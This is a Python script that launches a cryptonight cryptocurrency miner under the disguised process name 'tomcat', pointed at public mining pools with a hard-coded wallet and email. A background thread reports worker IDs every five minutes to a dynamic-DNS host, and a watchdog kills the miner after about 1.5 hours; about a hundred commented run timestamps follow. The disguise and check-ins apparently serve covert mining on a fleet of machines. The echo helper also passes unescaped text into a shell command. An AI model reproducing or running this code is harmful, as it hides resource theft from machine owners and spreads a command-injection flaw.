import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:06.021484
#2018-02-17 17:27:05.861795
#2018-02-17 19:16:04.826094
#2018-02-17 21:04:07.796702
#2018-02-17 22:49:07.396797
#2018-02-18 00:34:05.254339
#2018-02-18 02:25:05.885831
#2018-02-18 04:12:01.291237
#2018-02-18 06:02:04.226202
#2018-02-18 07:52:05.868910
#2018-02-18 09:41:07.899393
#2018-02-18 11:28:01.436010
#2018-02-18 13:15:06.525548
#2018-02-18 15:03:04.828496
#2018-02-18 16:51:03.848266
#2018-02-18 18:39:02.135335
#2018-02-18 20:27:05.920836
#2018-02-18 22:13:05.664720
#2018-02-19 00:03:05.074203
#2018-02-19 01:48:06.393919
#2018-02-19 03:35:05.868482
#2018-02-19 05:20:02.910488
#2018-02-19 07:07:05.997614
#2018-02-19 08:56:05.272123
#2018-02-19 10:45:10.319706
#2018-02-19 12:33:10.939588
#2018-02-19 14:19:08.524914
#2018-02-19 16:08:01.329036
#2018-02-19 17:55:09.447482
#2018-02-19 19:43:05.011440
#2018-02-19 21:32:05.349450
#2018-02-19 23:17:07.424390
#2018-02-20 01:04:02.213688
#2018-02-20 02:53:02.213973
#2018-02-20 04:40:10.244205
#2018-02-20 06:24:08.065850
#2018-02-20 08:09:07.356473
#2018-02-20 09:55:04.965465
#2018-02-20 11:39:08.669233
#2018-02-20 13:26:07.064412
#2018-02-20 15:10:10.116974
#2018-02-20 16:54:05.677970
#2018-02-20 18:42:01.298320
#2018-02-20 20:32:03.584521
#2018-02-20 22:16:06.786272
#2018-02-20 23:58:06.011785
#2018-02-21 01:44:01.753021
#2018-02-21 03:35:03.904304
#2018-02-21 05:24:05.832430
#2018-02-21 07:11:08.184551
#2018-02-21 08:58:05.655141
#2018-02-21 10:46:11.330601
#2018-02-21 12:33:09.393427
#2018-02-21 14:19:07.027410
#2018-02-21 16:06:10.131214
#2018-02-21 17:58:03.622431
#2018-02-21 19:43:08.193257
#2018-02-21 21:31:06.071665
#2018-02-21 23:17:01.420416
#2018-02-22 01:06:06.685891
#2018-02-22 02:53:03.969759
#2018-02-22 04:39:03.900963
#2018-02-22 06:24:06.651890
#2018-02-22 08:11:04.567387
#2018-02-22 09:58:07.097336
#2018-02-22 11:43:01.417907
#2018-02-22 13:30:03.189427
#2018-02-22 15:18:05.000243
#2018-02-22 17:03:09.259579
#2018-02-22 18:51:08.427471
#2018-02-22 20:44:07.793002
#2018-02-22 22:30:01.502037
#2018-02-23 00:15:04.755455
#2018-02-23 02:03:04.253684
#2018-02-23 03:52:04.139357
#2018-02-23 05:34:03.737238
#2018-02-23 07:19:06.404378
#2018-02-23 09:23:02.157270
#2018-02-23 11:28:06.693414
#2018-02-23 13:19:06.733887
#2018-02-23 15:05:06.747701
#2018-02-23 16:55:09.375638
#2018-02-23 18:44:07.293958
#2018-02-23 20:31:01.459222
#2018-02-23 22:18:06.078137
#2018-02-24 00:04:03.871115
#2018-02-24 01:56:04.199178
#2018-02-24 03:47:07.775412
#2018-02-24 05:35:05.556903
#2018-02-24 07:21:07.542145
#2018-02-24 09:11:06.203094
#2018-02-24 11:09:07.175745
#2018-02-24 12:57:07.116219
#2018-02-24 14:45:08.949867
#2018-02-24 16:37:05.618502
#2018-02-24 18:25:06.522282
#2018-02-24 20:12:02.127562
#2018-02-24 21:57:04.908441
#2018-02-25 00:57:06.453976
#2018-02-25 04:45:04.042480
#2018-02-25 08:58:01.466185